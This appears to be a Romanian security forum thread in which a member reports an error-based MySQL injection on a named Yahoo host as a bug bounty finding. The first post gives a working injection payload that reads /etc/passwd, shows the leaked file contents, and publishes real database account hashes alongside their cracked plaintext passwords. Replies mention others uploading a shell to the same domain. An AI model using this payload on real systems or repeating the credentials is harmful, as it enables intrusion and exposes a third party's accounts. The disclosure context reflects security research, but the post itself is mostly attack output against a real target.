Active Members dancezar Posted July 18, 2014 Active Members Report Share Posted July 18, 2014 (edited) Target: ard.yahoo.netExploit: Mysql injection error basedMetod: POSTP.O.C 1#http://s30.postimg.org/o922i33en/SQLi_Version.jpgP.O.C 2#http://s29.postimg.org/7qcy35o9x/root.jpgroot*FBC29A1C04A33DD6F834D6C4F7B19600CD9A78CD: zaq1zaq1zqgame_com*E2EF6EF6136DB3CB73A1B7C5588BD09CF8602894: 1qaz1qazParole pentru mysql dictionary based:))File_Priv era Y deci se puteau citi fisiere , dar nu si scrie din cauza acelui slash \ chiar daca bagai ' sau ".' or 1 group by concat(mid(load_file('/etc/passwd'),1,64),floor(rand(0)*2)) having min(0) or 1#(Duplicate entry 'root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin' for key 'group_key')Ciudat este ca eroarea aparea chiar daca bagai ' sau \u0027 sau \x27 .Eroarea a fost descoperita de @akkiliON , iar eu am reusit sa o exploatez.Vulnerabilitatea a fost triaged si cel mai probabil daca vom primi bani vom imparti recompensa. Edited July 18, 2014 by danyweb09 1 Quote Link to comment Share on other sites More sharing options...
pr0fw3b Posted July 18, 2014 Report Share Posted July 18, 2014 Felicitari Quote Link to comment Share on other sites More sharing options...
Open Posted July 18, 2014 Report Share Posted July 18, 2014 Ce tine de yahoo.net nu prea ofera recompensa, tin minte ca au fost unii care au urcat si shell in yahoo.net si nu au primit nimic, eu va tin pumnii sa luati cat mai mult. Quote Link to comment Share on other sites More sharing options...
Active Members akkiliON Posted September 1, 2014 Active Members Report Share Posted September 1, 2014 This report is not eligible for a bounty because it is not within the scope for an award. However, the report is still considered when calculating your overall rank in the Hall of Fame. Quote Link to comment Share on other sites More sharing options...
